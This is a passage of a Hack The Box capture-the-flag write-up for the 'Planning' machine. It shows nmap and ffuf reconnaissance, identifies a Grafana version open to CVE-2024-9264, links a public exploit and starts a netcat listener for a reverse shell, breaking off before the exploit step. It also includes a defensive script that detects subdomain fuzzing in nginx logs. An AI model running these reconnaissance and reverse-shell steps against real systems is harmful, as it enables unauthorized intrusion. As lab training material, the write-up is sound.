Hack The Box - Planning - May 10th

Difficulty: Easy
OS: Linux
Points: 20
Date: 2025-05-10

๐Ÿ“ Initial Access Info

We begin this assessment with credentials commonly provided in real-life pentests:

Username: admin  
Password: 0D5oT70Fq13EvB5r

๐Ÿ” Reconnaissance

๐Ÿ”Ž Nmap Scan

nmap -sV -sC -oN scan BOX-IP
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Edukate - Online Education Website
|_http-server-header: nginx/1.24.0 (Ubuntu)

๐ŸŒ Web Enumeration

๐Ÿ“Œ Main Site - http://planning.htb

  • Title: Edukate - Online Education Website

  • Web Server: nginx/1.24.0

Subdomain Discovery

Using ffuf with the top subdomain wordlist:

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.planning.htb" -u http://BOX-IP -ac -v

Found Subdomain: `grafana.planning.htb`
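
From the defender's side, the Host-header fuzzing above shows up as one client sending many distinct `*.planning.htb` Host values in a short time. The following detection sketch is an added example, not part of the original writeup; the nginx `log_format`, the client addresses, the threshold and the window are assumptions, and the log lines are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Assumed nginx log_format (not from the page; the default "combined" format omits Host):
#   log_format vhost '$remote_addr [$time_iso8601] "$host" "$request" $status';
LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "([^"]*)" "[^"]*" \d{3}$')

def parse(line):
    """Return (client_ip, timestamp, host) or None for a line that does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group(1), datetime.fromisoformat(m.group(2)), m.group(3).lower()

def detect_vhost_fuzzing(lines, base_domain, threshold=20, window=timedelta(seconds=60)):
    """Map each client to its peak count of distinct subdomain Host values
    inside any sliding window, keeping only clients at or above threshold."""
    suffix = "." + base_domain
    events = defaultdict(list)
    for line in lines:
        rec = parse(line)
        if rec and rec[2].endswith(suffix):
            events[rec[0]].append((rec[1], rec[2]))
    flagged = {}
    for ip, evs in events.items():
        evs.sort()
        start, counts, peak = 0, defaultdict(int), 0
        for ts, host in evs:
            counts[host] += 1
            while ts - evs[start][0] > window:  # drop events older than the window
                old = evs[start][1]
                counts[old] -= 1
                if counts[old] == 0:
                    del counts[old]
                start += 1
            peak = max(peak, len(counts))
        if peak >= threshold:
            flagged[ip] = peak
    return flagged

def sample_log():
    """Constructed sample: one client cycling Host values, one ordinary visitor."""
    t0 = datetime(2025, 5, 10, 12, 0, tzinfo=timezone.utc)
    stamp = lambda s: (t0 + timedelta(seconds=s)).isoformat()
    lines = [f'203.0.113.7 [{stamp(i // 4)}] "w{i}.planning.htb" "GET / HTTP/1.1" 301'
             for i in range(40)]
    lines += [f'198.51.100.20 [{stamp(i)}] "grafana.planning.htb" "GET /login HTTP/1.1" 200'
              for i in range(5)]
    return lines + ["not a log line"]

if __name__ == "__main__":
    print(detect_vhost_fuzzing(sample_log(), "planning.htb"))
```

Logging `$host` is what makes this visible at all; with the default access log format every fuzzed request looks like the same `GET /`.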

โš™๏ธ Grafana Exploitation

Upon visiting http://grafana.planning.htb, we identified:

  • Version: Grafana 11.0.0

  • Login using provided credentials failed

  • This version is vulnerable to CVE-2024-9264 (authenticated RCE)

https://github.com/z3k0sec/CVE-2024-9264-RCE-Exploit?tab=readme-ov-file

Exploiting CVE-2024-9264

Started listener:

nc -lvnp 9001

Executed exploit: